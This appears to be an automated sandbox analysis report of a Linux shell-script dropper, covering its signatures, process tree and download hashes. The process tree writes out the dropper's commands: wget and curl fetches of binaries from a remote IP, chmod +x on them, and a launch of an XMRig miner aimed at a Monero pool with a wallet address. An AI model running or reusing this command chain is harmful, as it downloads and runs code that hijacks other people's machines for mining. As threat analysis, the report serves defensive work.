Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhf
    image:debian9-armhf-20240611-en
    kernel:4.9.0-13-armmp-lpae
    locale:en-us
    os:debian-9-armhf
    system
  • submitted
    21/10/2024, 01:53

General

  • Target
    37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh
  • Size
    700B
  • MD5
    c4d089011765cf8fa828d28b6eeeac3e
  • SHA1
    43d933e706b0eefd0db2b5acba19205ebc1af2bd
  • SHA256
    37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19
  • SHA512
    3f55a27fc44062f48d0ee1c11c7b2ece0d3478e89744618d337dd2854b3b68e7e6161d0e38e21b32b4f85a1ee2d2fb523c7b94cc984fdff36ef65a9ddf45bae9

Malware Config

Signatures

  • XMRig Miner payload 2 IoCs
  • xmrig

    XMRig is a high-performance, open-source, cross-platform CPU/GPU miner.

  • File and Directory Permissions Modification 1 TTPs 26 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 16 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information that indicates whether the system is a virtual machine.

  • Enumerates kernel/hardware configuration 1 TTPs 1 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 2 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh
    /tmp/37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh
    1⤵
      PID:656
    • /usr/bin/wget
      wget 205.185.117.101/log2 -O /dev/null
      2⤵
      PID:657
    • /usr/bin/curl
      curl -L 205.185.117.101/log2 -o /dev/null
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      PID:677
    • /usr/bin/wget
      wget 205.185.117.101/__min__ -O /.__min__
      2⤵
      PID:684
    • /usr/bin/wget
      wget 205.185.117.101/__min__c -O /.__min__c
      2⤵
      PID:763
    • /usr/bin/wget
      wget 205.185.117.101/__min__m -O /.__min__m
      2⤵
      PID:764
    • /bin/chmod
      chmod +x /.__min__
      2⤵
      • File and Directory Permissions Modification
      PID:765
    • /bin/chmod
      chmod +x /.__min__c
      2⤵
      • File and Directory Permissions Modification
      PID:766
    • /bin/chmod
      chmod +x /.__min__m
      2⤵
      • File and Directory Permissions Modification
      PID:767
    • /usr/bin/nproc
      nproc --all
      2⤵
      • Enumerates kernel/hardware configuration
      PID:768
    • /bin/hostname
      hostname
      2⤵
      PID:770
    • /.__min__c
      /.__min__c
      2⤵
      • Executes dropped EXE
      PID:771
    • /.__min__
      /.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-armhf-20240611-en-7 --tls -k
      2⤵
      • Executes dropped EXE
      PID:773
    • /usr/bin/wget
      wget 205.185.117.101/__min__c -O /.__min__c
      2⤵
      PID:776
    • /usr/bin/wget
      wget 205.185.117.101/__min__ -O /.__min__
      2⤵
      PID:777
    • /usr/bin/wget
      wget 205.185.117.101/__min__m -O /.__min__m
      2⤵
      PID:780
    • /bin/chmod
      chmod +x /.__min__
      2⤵
      • File and Directory Permissions Modification
      PID:784
    • /bin/hostname
      hostname
      2⤵
      PID:785
    • /.__min__
      /.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-armhf-20240611-en-7 --tls -k
      2⤵
      • Executes dropped EXE
      PID:786
    • /usr/bin/wget
      wget 205.185.117.101/__min__ -O /.__min__
      2⤵
      PID:788
    • /bin/chmod
      chmod +x /.__min__c
      2⤵
      • File and Directory Permissions Modification
      PID:791
    • /bin/chmod
      chmod +x /.__min__m
      2⤵
      • File and Directory Permissions Modification
      PID:792
    • /.__min__c
      /.__min__c
      2⤵
      • Executes dropped EXE
      PID:793
    • /usr/bin/wget
      wget 205.185.117.101/__min__c -O /.__min__c
      2⤵
      PID:795
    • /usr/bin/wget
      wget 205.185.117.101/__min__m -O /.__min__m
      2⤵
      PID:796
    • /bin/chmod
      chmod +x /.__min__c
      2⤵
      • File and Directory Permissions Modification
      PID:799
    • /bin/chmod
      chmod +x /.__min__m
      2⤵
      • File and Directory Permissions Modification
      PID:800
    • /.__min__c
      /.__min__c
      2⤵
      • Executes dropped EXE
      PID:801
    • /usr/bin/wget
      wget 205.185.117.101/__min__c -O /.__min__c
      2⤵
      PID:803
    • /usr/bin/wget
      wget 205.185.117.101/__min__m -O /.__min__m
      2⤵
      PID:804
    • /bin/chmod
      chmod +x /.__min__
      2⤵
      • File and Directory Permissions Modification
      PID:805
    • /bin/hostname
      hostname
      2⤵
      PID:806
    • /.__min__
      /.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-armhf-20240611-en-7 --tls -k
      2⤵
      • Executes dropped EXE
      PID:807
    • /usr/bin/wget
      wget 205.185.117.101/__min__ -O /.__min__
      2⤵
      PID:809
    • /bin/chmod
      chmod +x /.__min__c
      2⤵
      • File and Directory Permissions Modification
      PID:812
    • /bin/chmod
      chmod +x /.__min__m
      2⤵
      • File and Directory Permissions Modification
      PID:813
    • /.__min__c
      /.__min__c
      2⤵
      • Executes dropped EXE
      PID:814
    • /usr/bin/wget
      wget 205.185.117.101/__min__c -O /.__min__c
      2⤵
      PID:816
    • /usr/bin/wget
      wget 205.185.117.101/__min__m -O /.__min__m
      2⤵
      PID:817
    • /bin/chmod
      chmod +x /.__min__c
      2⤵
      • File and Directory Permissions Modification
      PID:820
    • /bin/chmod
      chmod +x /.__min__m
      2⤵
      • File and Directory Permissions Modification
      PID:821
    • /.__min__c
      /.__min__c
      2⤵
      • Executes dropped EXE
      PID:822
    • /usr/bin/wget
      wget 205.185.117.101/__min__c -O /.__min__c
      2⤵
      PID:824
    • /bin/chmod
      chmod +x /.__min__
      2⤵
      • File and Directory Permissions Modification
      PID:825
    • /bin/hostname
      hostname
      2⤵
      PID:826
    • /.__min__
      /.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-armhf-20240611-en-7 --tls -k
      2⤵
      • Executes dropped EXE
      PID:827
    • /usr/bin/wget
      wget 205.185.117.101/__min__ -O /.__min__
      2⤵
      PID:829
    • /usr/bin/wget
      wget 205.185.117.101/__min__m -O /.__min__m
      2⤵
      PID:831
    • /bin/chmod
      chmod +x /.__min__c
      2⤵
      • File and Directory Permissions Modification
      PID:833
    • /bin/chmod
      chmod +x /.__min__m
      2⤵
      • File and Directory Permissions Modification
      PID:834
    • /.__min__c
      /.__min__c
      2⤵
      • Executes dropped EXE
      PID:835
    • /usr/bin/wget
      wget 205.185.117.101/__min__c -O /.__min__c
      2⤵
      PID:837
    • /usr/bin/wget
      wget 205.185.117.101/__min__m -O /.__min__m
      2⤵
      PID:838
    • /bin/chmod
      chmod +x /.__min__c
      2⤵
      • File and Directory Permissions Modification
      PID:841
    • /bin/chmod
      chmod +x /.__min__m
      2⤵
      • File and Directory Permissions Modification
      PID:842
    • /.__min__c
      /.__min__c
      2⤵
      • Executes dropped EXE
      PID:843
    • /usr/bin/wget
      wget 205.185.117.101/__min__c -O /.__min__c
      2⤵
      PID:845
    • /usr/bin/wget
      wget 205.185.117.101/__min__m -O /.__min__m
      2⤵
      PID:846
    • /bin/chmod
      chmod +x /.__min__c
      2⤵
      • File and Directory Permissions Modification
      PID:849
    • /bin/chmod
      chmod +x /.__min__m
      2⤵
      • File and Directory Permissions Modification
      PID:850
    • /.__min__c
      /.__min__c
      2⤵
      • Executes dropped EXE
      PID:851
    • /usr/bin/wget
      wget 205.185.117.101/__min__c -O /.__min__c
      2⤵
      PID:853
    • /usr/bin/wget
      wget 205.185.117.101/__min__m -O /.__min__m
      2⤵
      PID:854
    • /bin/chmod
      chmod +x /.__min__
      2⤵
      • File and Directory Permissions Modification
      PID:859
    • /bin/hostname
      hostname
      2⤵
      PID:860
    • /.__min__
      /.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-armhf-20240611-en-7 --tls -k
      2⤵
      • Executes dropped EXE
      PID:861
    • /usr/bin/wget
      wget 205.185.117.101/__min__ -O /.__min__
      2⤵
      PID:863
    • /bin/chmod
      chmod +x /.__min__c
      2⤵
      • File and Directory Permissions Modification
      PID:864
    • /bin/chmod
      chmod +x /.__min__m
      2⤵
      • File and Directory Permissions Modification
      PID:865
    • /.__min__c
      /.__min__c
      2⤵
      • Executes dropped EXE
      PID:866
    • /usr/bin/wget
      wget 205.185.117.101/__min__c -O /.__min__c
      2⤵
      PID:868
    • /usr/bin/wget
      wget 205.185.117.101/__min__m -O /.__min__m
      2⤵
      PID:869
    • /bin/chmod
      chmod +x /.__min__c
      2⤵
      • File and Directory Permissions Modification
      PID:874
    • /bin/chmod
      chmod +x /.__min__m
      2⤵
      • File and Directory Permissions Modification
      PID:875
    • /.__min__c
      /.__min__c
      2⤵
      • Executes dropped EXE
      PID:876
    • /usr/bin/wget
      wget 205.185.117.101/__min__c -O /.__min__c
      2⤵
      PID:878
    • /bin/chmod
      chmod +x /.__min__
      2⤵
      • File and Directory Permissions Modification
      PID:879
    • /bin/hostname
      hostname
      2⤵
      PID:880
    • /.__min__
      /.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-armhf-20240611-en-7 --tls -k
      2⤵
      • Executes dropped EXE
      PID:881
    • /usr/bin/wget
      wget 205.185.117.101/__min__ -O /.__min__
      2⤵
      PID:883
    • /usr/bin/wget
      wget 205.185.117.101/__min__m -O /.__min__m
      2⤵
      PID:884

Downloads

  • /.__min__
    Filesize
    8.2MB
    MD5
    8f96e8b4e9d26884c776c1b42a70bae5
    SHA1
    53a4166052211abf77e1edf0d71c7a6faae12cc5
    SHA256
    5e5fd0bc5f1bd663d7ccc2695c2b56bd382df3c7fdac605eb0ce3c0d5df24dc4
    SHA512
    4709a5ee74cf3e91472b64891eaf9cd7cd8bde6059be6fd892863274c505fd3cf5f5631d66d01ab645406adb76b6123d287d97e90a6c08bf8f8a935a6624dcec
  • /.__min__c
    Filesize
    1.6MB
    MD5
    d3e378df1f5f920faaf9ef9e14a54f55
    SHA1
    b039ff3865762819392cec53eeac7c8ee0a630c3
    SHA256
    58fa45ce3665fd665bde9589297a5a34c8df403e8732eb7bdc77d00c669fac29
    SHA512
    40ad13e858412d4d809d5eccb55c4e31ab65183f9064daea2d2b5e5bb311de4d43121337bb523ff1128cb9bd61319367de7e62f96ed2065b680f53371623d358
  • /.__min__m
    Filesize
    2.9MB
    MD5
    d98aa7684a42d8197b0eb2946c6d4fab
    SHA1
    a5a7cb1c92f7c9ce302caaaab7d52f70ce7564da
    SHA256
    bacd68209fed7455e465c223d55af9574e23616f94e52c1c10ee7a1b8673898e
    SHA512
    e2cce2d0e96546bfe233e8294d49ed020db89c2a5968e57a2d84b9cd02cf71060805d765050792d81d0a238cf22eb41a030d6364256115bba5f43cb40f99b1ee